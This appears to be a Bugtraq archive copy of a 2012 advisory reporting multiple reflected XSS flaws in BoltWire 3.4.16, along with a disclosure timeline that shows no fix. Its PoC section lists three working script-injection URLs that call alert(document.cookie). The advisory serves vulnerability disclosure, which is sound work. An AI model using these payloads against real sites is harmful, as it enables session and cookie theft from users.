[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

BoltWire 3.4.16 Multiple XSS vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: BoltWire 3.4.16 Multiple XSS vulnerabilities
From: sschurtz@xxxxxxxxxxxxxxx
Date: Sun, 15 Jan 2012 09:47:23 GMT

Advisory:               BoltWire 3.4.16 Multiple XSS vulnerabilities
Advisory ID:            SSCHADV2012-001
Author:                 Stefan Schurtz
Affected Software:      Successfully tested on BoltWire 3.4.16
Vendor URL:             http://www.boltwire.com/
Vendor Status:          informed

==========================
Vulnerability Description
==========================

BoltWire 3.4.16 is prone to multiple XSS vulnerabilities

==================
PoC-Exploit
==================

http://[target]/bolt/field/index.php?p=main&help='"</script><script>alert(document.cookie)</script>
http://[target]/bolt/field/index.php?";</a><script>alert(document.cookie)</script></
http://[target]/bolt/field/index.php?p=main&action='"</a><script>alert(document.cookie)</script></&file=file.jpg

=========
Solution
=========

-

====================
Disclosure Timeline
====================

01-Jan-2012 - vendor informed
01-Jan-2012 - vendor feedback
15-Jan-2012 - no fix available

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-001.txt

Prev by Date: PHP 5.3.8 Multiple vulnerabilities
Next by Date: ATutor 2.0.3 Multiple XSS vulnerabilities
Previous by thread: PHP 5.3.8 Multiple vulnerabilities
Next by thread: ATutor 2.0.3 Multiple XSS vulnerabilities
Index(es):
- Date
- Thread